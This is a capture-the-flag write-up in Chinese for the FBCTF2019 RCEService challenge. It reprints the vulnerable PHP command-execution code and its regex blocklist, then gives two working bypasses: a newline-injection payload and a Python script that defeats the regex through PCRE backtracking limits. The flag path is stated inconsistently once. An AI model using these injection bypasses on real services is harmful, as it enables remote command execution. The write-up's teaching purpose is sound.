[FBCTF2019]RCEService 1
開啟之後他給我們提示了json,不妨直接嘗試注入
?cmd={"cmd":"ls"}
可以發現他給我們了回顯
呢麼接著嘗試輸入
?cmd={"cmd":"ls /"}
發現報錯了,顯然是有特殊符號被ban了,在網上找到了一篇文章看到了這道題目的原始碼
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>
這裡有兩種辦法
法1
可以看到是preg_match()函式進行的過濾,但是題目中沒有換行匹配,所以我們可以使用%0a繞過過濾
經過查詢可以得到flag的路徑為/bin/home/rceservice/flag
但是直接用cat 指令是沒辦法輸出結果的,但是在/bin目錄下看到了cat,所以說應該是題目的環境變數被改掉了,呢麼我們只能透過/bin/cat去呼叫cat再去輸出
最後的payload為:
?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}
法二
利用回溯的方法直接進行查詢
直接上指令碼
import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag ","nayi":"' + "a" * (1000000) + '"}' # 超過一百萬,這裡寫一千萬不會出結果。
res = requests.post("http://14cc40ec-3eb1-4549-b1a8-d369d671b411.node5.buuoj.cn:81/", data={"cmd": payload})
print(res.text)
最後得到flag